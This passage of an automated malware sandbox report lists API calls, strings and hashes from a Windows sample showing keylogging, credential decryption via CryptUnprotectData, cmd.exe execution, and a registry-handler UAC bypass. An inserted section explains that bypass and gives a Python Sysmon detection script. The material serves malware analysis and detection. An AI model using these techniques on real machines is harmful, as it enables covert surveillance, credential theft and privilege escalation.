            • SetLastError.KERNEL32(00000000), ref: 00445817
            • SetLastError.KERNEL32(00000000), ref: 00445820
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$_free
            • String ID:
            • API String ID: 3170660625-0
            • Opcode ID: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
            • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
            • Opcode Fuzzy Hash: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
            • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
            APIs
            • _free.LIBCMT ref: 0044DBB4
              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
            • _free.LIBCMT ref: 0044DBC6
            • _free.LIBCMT ref: 0044DBD8
            • _free.LIBCMT ref: 0044DBEA
            • _free.LIBCMT ref: 0044DBFC
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
            • Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
            • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
            • Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C
            APIs
            • _free.LIBCMT ref: 00441566
              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
            • _free.LIBCMT ref: 00441578
            • _free.LIBCMT ref: 0044158B
            • _free.LIBCMT ref: 0044159C
            • _free.LIBCMT ref: 004415AD
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
            • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
            • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
            • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
            APIs
            • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
            • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Enum$InfoQueryValue
            • String ID: [regsplt]
            • API String ID: 3554306468-4262303796
            • Opcode ID: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
            • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
            • Opcode Fuzzy Hash: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
            • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
            APIs
            • _strpbrk.LIBCMT ref: 0044B918
            • _free.LIBCMT ref: 0044BA35
              • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,?,?,?,?,?,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
              • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417), ref: 00439AC7
              • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000), ref: 00439ACE
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
            • String ID: *?$.
            • API String ID: 2812119850-3972193922
            • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
            • Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
            • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
            • Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: __alloca_probe_16__freea
            • String ID: H"G$H"GH"G
            • API String ID: 1635606685-3036711414
            • Opcode ID: 80076ff913fd6fdf96b59eec9a2e877d4b1c448352c335ccfb263d7e6081886f
            • Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
            • Opcode Fuzzy Hash: 80076ff913fd6fdf96b59eec9a2e877d4b1c448352c335ccfb263d7e6081886f
            • Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E
            APIs
            • __Init_thread_footer.LIBCMT ref: 0040189E
            • ExitThread.KERNEL32 ref: 004018D6
            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
              • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
            • String ID: 8:G
            • API String ID: 1649129571-405301104
            • Opcode ID: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
            • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
            • Opcode Fuzzy Hash: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
            • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
            APIs
            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe,00000104), ref: 00440975
            • _free.LIBCMT ref: 00440A40
            • _free.LIBCMT ref: 00440A4A
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$FileModuleName
            • String ID: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
            • API String ID: 2506810119-4105654757
            • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
            • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
            • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
            • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
            APIs
              • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
              • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
              • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
              • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
            • _wcslen.LIBCMT ref: 00419744
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseCurrentOpenProcessQueryValue_wcslen
            • String ID: .exe$program files (x86)\$program files\
            • API String ID: 37874593-1203593143
            • Opcode ID: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
            • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
            • Opcode Fuzzy Hash: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
            • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
            APIs
            • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
            • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
            • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
              • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
              • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CreateThread$LocalTimewsprintf
            • String ID: Offline Keylogger Started
            • API String ID: 465354869-4114347211
            • Opcode ID: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
            • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
            • Opcode Fuzzy Hash: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
            • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
            APIs
              • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
              • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            • CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 00409EB7
            • CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 00409EC3
            • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CreateThread$LocalTime$wsprintf
            • String ID: Online Keylogger Started
            • API String ID: 112202259-1258561607
            • Opcode ID: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
            • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
            • Opcode Fuzzy Hash: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
            • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
            APIs
            • GetLocalTime.KERNEL32(?), ref: 00404F61
            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
            • CreateThread.KERNEL32(00000000,00000000,00405130,?,00000000,00000000), ref: 00404FC0
            Strings
            • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Create$EventLocalThreadTime
            • String ID: Connection KeepAlive | Enabled | Timeout:
            • API String ID: 2532271599-507513762
            • Opcode ID: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
            • Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
            • Opcode Fuzzy Hash: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
            • Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA
            APIs
            • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
            • GetProcAddress.KERNEL32(00000000), ref: 00406097
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: CryptUnprotectData$crypt32
            • API String ID: 2574300362-2380590389
            • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
            • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
            • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
            • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
            APIs
            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
            • CloseHandle.KERNEL32(?), ref: 004051AA
            • SetEvent.KERNEL32(?), ref: 004051B9
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseEventHandleObjectSingleWait
            • String ID: Connection Timeout
            • API String ID: 2055531096-499159329
            • Opcode ID: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
            • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
            • Opcode Fuzzy Hash: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
            • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
            APIs
            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throw
            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
            • API String ID: 2005118841-1866435925
            • Opcode ID: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
            • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
            • Opcode Fuzzy Hash: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
            • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
            APIs
            • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
            • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
            • RegCloseKey.ADVAPI32(00000000), ref: 00412128
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseOpenQueryValue
            • String ID: origmsc
            • API String ID: 3677997916-68016026
            • Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
            • Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
            • Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
            • Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4
            APIs
            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExecuteShell
            • String ID: /C $cmd.exe$open
            • API String ID: 587946157-3896048727
            • Opcode ID: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
            • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
            • Opcode Fuzzy Hash: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
            • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
            APIs
            • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
            • RegCloseKey.ADVAPI32(00000000), ref: 00412054
            Strings
            • http\shell\open\command, xrefs: 00412026
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseOpenQueryValue
            • String ID: http\shell\open\command
            • API String ID: 3677997916-1487954565
            • Opcode ID: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
            • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
            • Opcode Fuzzy Hash: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
            • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
            APIs
            • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046FB08), ref: 0041220F
            • RegSetValueExW.ADVAPI32(0046FB08,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,0046FB08), ref: 0041223E
            • RegCloseKey.ADVAPI32(0046FB08,?,80000001,?,0040674F,00469654,0046FB08), ref: 00412249
            Strings
            • Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseCreateValue
            • String ID: Software\Classes\mscfile\shell\open\command
            • API String ID: 1818849710-505396733
            • Opcode ID: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
            • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
            • Opcode Fuzzy Hash: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
            • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
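The listing above shows the sample calling RegCreateKeyW on HKEY_CURRENT_USER (0x80000001) \Software\Classes\mscfile\shell\open\command and then RegSetValueExW on the new key. That key is the per-user handler for .msc consoles; mmc.exe started through the auto-elevating eventvwr.exe resolves the handler from the user hive before HKEY_CLASSES_ROOT, so a command written there runs at high integrity without a UAC prompt (MITRE ATT&CK T1548.002). The report records only the key write, not what the value points at. The detection below is an added example, not code from Joe Sandbox or from the sample: it scores Sysmon Event ID 13 (RegistryEvent, Value Set) records for user-hive writes to that handler. The flattened `key=value|...` record layout, the sample records, the two extra watched classes (ms-settings, exefile) and the self-reference heuristic are assumptions of the example.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# HKEY_CURRENT_USER (0x80000001 in the listing) is logged by Sysmon under HKU\<SID>\...,
# and because HKCU\Software\Classes is a link to the user's class hive the same write is
# usually recorded as HKU\<SID>_Classes\mscfile\... rather than
# HKU\<SID>\Software\Classes\mscfile\...; matching on the tail of TargetObject covers both.
WATCHED_CLASSES = {
    "mscfile": "seen in this sample (RegCreateKeyW ref 0041220F, RegSetValueExW ref 0041223E)",
    # assumption: further classes abused the same way; they do not appear in this report
    "ms-settings": "assumed extension",
    "exefile": "assumed extension",
}

_HIVE_RE = re.compile(r"^HKU\\(?P<sid>S-1-5-21-[\d-]+)(?:_Classes)?\\", re.IGNORECASE)
_TAIL_RE = re.compile(r"\\(?P<cls>[^\\]+)\\shell\\open\\command(?:\\(?P<value>[^\\]+))?$", re.IGNORECASE)

@dataclass(frozen=True)
class Finding:
    user_sid: str
    file_class: str
    value_name: str
    image: str
    command: str
    self_referencing: bool   # the handler now points at the process that wrote it
    note: str

def parse_record(line: str) -> dict:
    """Parse one flattened Sysmon record written as key=value|key=value (a constructed layout)."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields

def classify(record: dict) -> Optional[Finding]:
    """Flag an Event ID 13 (value set) record that rewrites a watched handler inside a user hive."""
    if record.get("EventID") != "13":
        # RegCreateKeyW itself surfaces as Event ID 12 (key create); on its own it says
        # nothing about what the handler will run, so only the value write is scored.
        return None
    target = record.get("TargetObject", "")
    tail = _TAIL_RE.search(target)
    if tail is None:
        return None
    file_class = tail.group("cls").lower()
    if file_class not in WATCHED_CLASSES:
        return None
    hive = _HIVE_RE.match(target)
    if hive is None:
        # HKLM\SOFTWARE\Classes is the machine-wide handler: writing it needs admin rights and
        # happens legitimately during installs, so it is out of scope for this check.
        return None
    image = record.get("Image", "")
    command = record.get("Details", "")
    return Finding(
        user_sid=hive.group("sid"),
        file_class=file_class,
        value_name=tail.group("value") or "(Default)",
        image=image,
        command=command,
        self_referencing=bool(image) and image.lower() in command.lower(),
        note=WATCHED_CLASSES[file_class],
    )

def scan_registry_events(lines: Iterable[str]) -> List[Finding]:
    """Run classify() over flattened records and keep the findings."""
    return [f for f in (classify(parse_record(l)) for l in lines if l.strip()) if f is not None]

# Constructed Sysmon records, flattened to one line each; none is taken from the report.
SAMPLE_EVENTS = [
    r"EventID=13|Image=C:\Users\victim\AppData\Roaming\updater.exe|TargetObject=HKU\S-1-5-21-1111111111-2222222222-3333333333-1001_Classes\mscfile\shell\open\command\(Default)|Details=C:\Users\victim\AppData\Roaming\updater.exe",
    r'EventID=13|Image=C:\Windows\System32\msiexec.exe|TargetObject=HKLM\SOFTWARE\Classes\mscfile\shell\open\command\(Default)|Details=%SystemRoot%\system32\mmc.exe "%1" %*',
    r"EventID=13|Image=C:\Windows\explorer.exe|TargetObject=HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx|Details=Binary Data",
    r"EventID=12|Image=C:\Users\victim\AppData\Roaming\updater.exe|TargetObject=HKU\S-1-5-21-1111111111-2222222222-3333333333-1001_Classes\mscfile\shell\open\command|Details=",
    r"EventID=13|Image=C:\Users\victim\AppData\Local\Temp\stage2.exe|TargetObject=HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Classes\mscfile\shell\open\command\(Default)|Details=C:\Users\victim\AppData\Local\Temp\stage2.exe",
]

if __name__ == "__main__":
    for finding in scan_registry_events(SAMPLE_EVENTS):
        print(finding)
```

Only the two user-hive writes are returned; the HKLM write by msiexec.exe, the unrelated MRU update and the Event ID 12 key creation are ignored. The self_referencing flag is the cheap high-confidence signal: a file handler that resolves to the very binary that wrote it has no legitimate explanation.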
            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
              • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
              • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
            • String ID: bad locale name
            • API String ID: 3628047217-1405518554
            • Opcode ID: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
            • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
            • Opcode Fuzzy Hash: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
            • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
            APIs
            • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
            • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
            • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseCreateValue
            • String ID: P0F
            • API String ID: 1818849710-3540264436
            • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
            • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
            • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
            • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
            APIs
